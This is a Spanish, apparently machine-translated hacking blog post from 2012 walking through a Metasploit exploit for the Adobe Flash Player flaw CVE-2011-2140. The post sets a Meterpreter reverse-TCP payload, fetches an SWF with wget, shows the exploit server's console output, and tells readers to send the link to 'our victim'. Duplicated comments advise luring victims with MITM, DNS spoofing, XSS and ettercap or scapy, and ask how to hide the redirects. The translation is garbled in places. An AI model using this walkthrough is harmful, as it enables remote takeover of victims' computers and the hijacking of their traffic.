ClsHack:Computer Security Blog    

[CVE-2011-2140 && Metasploit]Ejecución remota de código Flash Player

Publicado el: 10 Febrero 2012

Nuevo módulo añadido a Metasploit :D que aprovecha los errores en un nuevo Flash Player.

Vulnerabilidad indicada por el CVE-2011-2140, Aquí están los detalles:

Adobe Flash Player antes de 10.3.183.5 en Windows, Mac OS X, Linux, y Solaris, y antes de 10.3.186.3 on Android, y Adobe AIR antes de 2.7.1 en Windows y Mac OS X y antes de 2.7.1.1961 onen Androidpermite a los atacantes ejecutar código arbitrario o causar una denegación de servicio (de corrupción de memoria) a través de vectores no especificados, una vulnerabilidad diferente a CVE-2011-2135, CVE-2011-2417, y CVE-2011-2425.

Adobe Flash Player MP4 SequenceParameterSetNALUnit desbordamiento de búfer

Vamos a ver cómo utilizar Metasploit :D

La primera cosa a hacer es actualizar Metasploit:
sudo msfupdate

Ahora empezamos Metasploit:
sudo msfconsole

Usiamo la hazaña:
use exploit/windows/browser/adobe_flash_sps

Los comandos son siempre los :D
Hemos establecido la carga:
set PAYLOAD windows/meterpreter/reverse_tcp
Configurar la carga:
set LHOST MY_IP
Configuriamo la hazaña:
set URIPATH /

Ahora nos fijamos el Reproductor de archivos SWF, Me tomó de la POC abysssec:
wget http://www.clshack.it/nopaste/mediaplayer.swf
set SWF_PLAYER_URI mediaplayer.swf

Empezamos la hazaña:
msf exploit(adobe_flash_sps) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.190:4444
[*] Using URL: http://0.0.0.0:8080/J1YpA0
[*] Local IP: http://192.168.1.190:8080/J1YpA0
[*] Server started.
msf exploit(adobe_flash_sps) >

Que se diviertan :D

Enviamos nuestra víctima en nuestro ip:PUERTO , e ÁRBOL :D

Puestos relacionados con:

  1. [CVE-2010-1297]Metasploit:Flash Player 9 x, 10.0 Excution remota de código
  2. IE 6/7 EXPLOTAR Ejecución remota de código XML con Metasploit
  3. [CVE:2011-4862] Remote Root FreeBSD
  4. [CVE-2011-3544]Metasploit: Java Remote no lo son Java Web Start
  5. [CVE-2010-2568]Metasploit:oy en día las ventanas Exuction remota de código

Esta entrada fue publicada el viernes, 10 de febrero, 2012 en 9:39 am y está clasificada bajo: GNU / Linux, Piratería, Software. Puedes seguir cualquier respuesta a esta entrada a través de la RSS 2.0 alimentar. Usted puede dejar una respuesta, o trackback desde tu propio sitio.

Etiquetado con:
  • Salzo

    hola Pero esta hazaña trabajar de forma remota?

    • Ac1d

      Perdón, como parte de ejecución remota de código que no entiende?

  • Salzo

    hola Pero esta hazaña trabajar de forma remota?

    • Ac1d

      Perdón, como parte de ejecución remota de código que no entiende?

  • Anónimo

    Pero es un hazañas del lado del cliente tiene que pasar el enlace a la víctima ;) 
    Por ejemplo, con un ataque http://www.clshack.com/?s=mitm

    • Simone formatos

      así que por supuesto tengo que entrar en navegador de la víctima en mi ip con el puerto ?
      atacar a algunos’ insensato :-D

      • Anónimo

        Si se encuentra en la red local, o usted puede hacer un ataque MITM puede explotar algunos de los sitios de diferentes XSS, etcétera… es una tontería :D

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          si usted también debería ejecutar una parodia de dns locales…o mal?

          • Anónimo

            Usted puede hacer una parodia sencilla ;) 

        • Simone formatos

          así lo haré, por supuesto,, pero siempre tiene que decirle a la víctima para entrar en el enlace a esa dirección con el puerto! para que funcione…
          :-D

  • ClsHackBlog

    Pero es un hazañas del lado del cliente tiene que pasar el enlace a la víctima ;) 
    Por ejemplo, con un ataque http://www.clshack.com/?s=mitm

    • Simone formatos

      así que por supuesto tengo que entrar en navegador de la víctima en mi ip con el puerto ?
      atacar a algunos’ insensato :-D

      • ClsHackBlog

        Si se encuentra en la red local, o usted puede hacer un ataque MITM puede explotar algunos de los sitios de diferentes XSS, etcétera… es una tontería :D

        • http://www.facebook.com/people/Giovanni-Colucci/1336991660 John Colucci

          si usted también debería ejecutar una parodia de dns locales…o mal?

          • ClsHackBlog

            Usted puede hacer una parodia sencilla ;) 

        • Simone formatos

          así lo haré, por supuesto,, pero siempre tiene que decirle a la víctima para entrar en el enlace a esa dirección con el puerto! para que funcione…
          :-D

  • Zigfried Zorba

    Esta hazaña no funciona con Windows XP SP3..

    • Anónimo

      Trate de actualizar :)

  • Zigfried Zorba

    Esta hazaña no funciona con Windows XP SP3..

    • ClsHackBlog

      Trate de actualizar :)

  • zacky

    Pero ahora los routers modernos detener los ataques MITM y bloquear la conexión a la víctima (Se me ocurre con la estación de Vodafone, por ejemplo,) usted puede hacer para evitar esto lo?

    • Anónimo

      Si usted no es local, si usted es remota debe encontrar otra manera de hacer que la víctima rendirect nattato su ip en el exterior :) 

      • zacky

        sisi significa a nivel local .. utilizando ettercap veces a causa de la protección interna de algunos routers (al menos eso creo) el ataque no tiene éxito y el tráfico de la víctima se bloquea y ya no es capaz de navegar!! Lo que puede hacer en estos casos?

        • Anónimo

          entender el problema que a veces es un problema en ettercap :D

          Yo uso para hacer MITM scapy y te encuentras con algo que aquí en el blog ;)De lo contrario enviar el enlace a la víctima :D

          • zacky

            Así que supongo que es hora de tratar de installaro jeje ;)

          • zacky

            intentado pero no hay manera es mi estación de Vodafone sgama el mac y duplicados que bloquea el tráfico :S

  • zacky

    Pero ahora los routers modernos detener los ataques MITM y bloquear la conexión a la víctima (Se me ocurre con la estación de Vodafone, por ejemplo,) usted puede hacer para evitar esto lo?

    • ClsHackBlog

      Si usted no es local, si usted es remota debe encontrar otra manera de hacer que la víctima rendirect nattato su ip en el exterior :) 

      • zacky

        sisi significa a nivel local .. utilizando ettercap veces a causa de la protección interna de algunos routers (al menos eso creo) el ataque no tiene éxito y el tráfico de la víctima se bloquea y ya no es capaz de navegar!! Lo que puede hacer en estos casos?

        • ClsHackBlog

          entender el problema que a veces es un problema en ettercap :D

          Yo uso para hacer MITM scapy y te encuentras con algo que aquí en el blog ;)De lo contrario enviar el enlace a la víctima :D

          • zacky

            Así que supongo que es hora de tratar de installaro jeje ;)

          • zacky

            intentado pero no hay manera es mi estación de Vodafone sgama el mac y duplicados que bloquea el tráfico :S

  • Unknownita

    Tengo una pregunta, pero si hago una dsnspoof como cambiar los DNS en el router mediante la reorientación de PC de la víctima infectada en la dirección. Luego, después de no peor? porque el usuario va a escribir cada vez que http://www.google.it final del sitio infectado? hay una mayor transparencia?que sin duda entiendo que algo está mal..

    • Unknownita

      Quizás una solución podría ser la de dirigirla hacia mi página en blanco que luego se redirige el segundo después de tot el sitio real?

  • Unknownita

    Tengo una pregunta, pero si hago una dsnspoof como cambiar los DNS en el router mediante la reorientación de PC de la víctima infectada en la dirección. Luego, después de no peor? porque el usuario va a escribir cada vez que http://www.google.it final del sitio infectado? hay una mayor transparencia?que sin duda entiendo que algo está mal..

    • Unknownita

      Quizás una solución podría ser la de dirigirla hacia mi página en blanco que luego se redirige el segundo después de tot el sitio real?